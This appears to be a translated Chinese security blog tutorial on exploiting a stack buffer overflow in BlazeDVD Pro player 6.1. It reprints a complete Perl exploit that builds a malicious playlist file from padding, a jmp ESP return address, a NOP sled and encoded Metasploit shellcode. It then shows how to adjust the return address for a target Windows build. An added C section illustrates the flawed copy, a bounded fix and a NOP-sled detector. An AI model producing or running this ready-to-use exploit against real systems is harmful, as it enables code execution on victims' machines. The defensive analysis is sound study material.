Student Penetration Log 19: BlazeDVD Pro player 6.1 buffer overflow exploitation

暗月博客, 2019-11-21 21:08:41

Author: 新月 (Xinyue)

Once again a new piece from our 新月; gather round and watch the fun.

The usual ad (for penetration testing come to 暗月, for learning code auditing find 暗月; we are currently preparing the fourth-quarter session, and any good suggestions are welcome in the comments).

The main text follows:

A friend sent me an exploit for a media player:

http://www.exploit-db.com/exploits/26889/

```perl
#!/usr/bin/perl
# BlazeDVD Pro player 6.1  Local stack based buffer overflow
# Author: PuN1sh3r
# Email: [email protected]
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials

$file = "blazeExpl.plf";
$junk = "\x41" x 260;            # 260 bytes of padding up to the saved return address
$eip  = "\x33\xFE\xE4\x77";      # jmp ESP on kernel32.dll (little-endian; depends on the OS build)

# msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode =
"\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";

# padding, then return address, a 50-byte NOP sled and the shellcode
$junk .= $eip . "\x90" x 50 . $shellcode;

###############################################################
open(FILE, ">$file");
print FILE $junk;
close(FILE);
###############################################################
```
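The exploit above lays the playlist entry out as 260 bytes of padding, a 4-byte return address, a 50-byte NOP sled and then the shellcode. As an added illustration (not BlazeDVD's code and not the exploit author's), the C below shows the class of bug this relies on, a fixed-size stack buffer filled by an unbounded copy, next to a length-checked version, plus a small triage check that flags a playlist line that would not fit the buffer or that carries a NOP sled. The 260-byte buffer size, the function names and the constructed payload are assumptions; the constructed line uses "BBBB" in the return-address slot and 0xCC filler where the shellcode would sit.

```c
#include <stdio.h>
#include <string.h>

/* Assumed entry buffer size; chosen to match the 260 bytes of padding the
 * exploit writes before the saved return address. */
#define ENTRY_BUF 260

/* Illustrative vulnerable pattern (assumption, not BlazeDVD's real code):
 * the entry is copied into a fixed-size stack buffer with no length check,
 * so a line longer than ENTRY_BUF bytes runs past the buffer into the saved
 * frame pointer and return address. Never called in the demo below. */
int load_entry_unsafe(const char *line)
{
    char path[ENTRY_BUF];
    strcpy(path, line);                 /* unbounded copy: the bug */
    return (int)strlen(path);
}

/* Hardened form: validate the length before copying, then use a bounded copy.
 * Returns the entry length, or -1 when the line does not fit. */
int load_entry_safe(const char *line, size_t line_len)
{
    char path[ENTRY_BUF];
    if (line == NULL || line_len >= sizeof path)
        return -1;                      /* reject instead of overflowing */
    memcpy(path, line, line_len);
    path[line_len] = '\0';
    return (int)line_len;
}

/* Triage check for a raw playlist line: bit 0 set when the line exceeds
 * max_len, bit 1 set when it contains a run of at least sled_min 0x90 bytes
 * (the NOP sled the exploit writes). */
int flag_suspicious_entry(const unsigned char *buf, size_t n,
                          size_t max_len, size_t sled_min)
{
    int flags = 0;
    size_t run = 0;
    if (n > max_len)
        flags |= 1;
    for (size_t i = 0; i < n; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run >= sled_min) {
            flags |= 2;
            break;
        }
    }
    return flags;
}

/* Constructed test line with the same shape as the exploit's $junk:
 * 260 x 'A', a 4-byte placeholder "BBBB" in the return-address slot,
 * 50 NOPs, then 16 bytes of 0xCC standing in for shellcode.
 * Writes into out (at least 330 bytes) and returns the total length. */
size_t build_test_payload(unsigned char *out)
{
    size_t n = 0;
    memset(out + n, 'A', 260);  n += 260;
    memcpy(out + n, "BBBB", 4); n += 4;
    memset(out + n, 0x90, 50);  n += 50;
    memset(out + n, 0xCC, 16);  n += 16;
    return n;
}

int main(void)
{
    unsigned char payload[512];
    size_t n = build_test_payload(payload);
    printf("constructed line: %zu bytes, flags=%d\n", n,
           flag_suspicious_entry(payload, n, ENTRY_BUF, 16));
    printf("safe loader on it: %d\n", load_entry_safe((const char *)payload, n));
    printf("safe loader on a normal entry: %d\n", load_entry_safe("movie.vob", 9));
    return 0;
}
```

The safe loader returns -1 for the constructed 330-byte line and 9 for a normal entry, and the triage check reports both the oversize length and the sled (flags = 3) for the constructed line and 0 for the normal one.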

Let's test it.

First, use this exploit to generate the crafted file.

Run it:

[screenshot]

Generated:

[screenshot]

Then open the file with the player:

[screenshot]

Because the ESP address differs from one system version to another, we just need to change the ESP (return) address in the exploit.

We use the findaddr.exe tool to search the system's kernel32.dll for a usable ESP address.

[screenshot]

Usage:

findaddr kernel32.dll esp

[screenshot]

[+]Scanning kernel32.dll for code useable with the esp register

[+]0x7c82385d   call esp

[+]Finished Scanning kernel32.dll for code useable with the esp register

[+]Found 1 usable addresses

ESP address: 0x7c82385d (written into $eip in little-endian byte order, as the original exploit does)

Open the file with the player again:

[screenshot]

It pops up successfully, O(∩_∩)O

暗月: that is how powerful a buffer overflow is.

Original link: http://cn-sec.com/archives/71851.html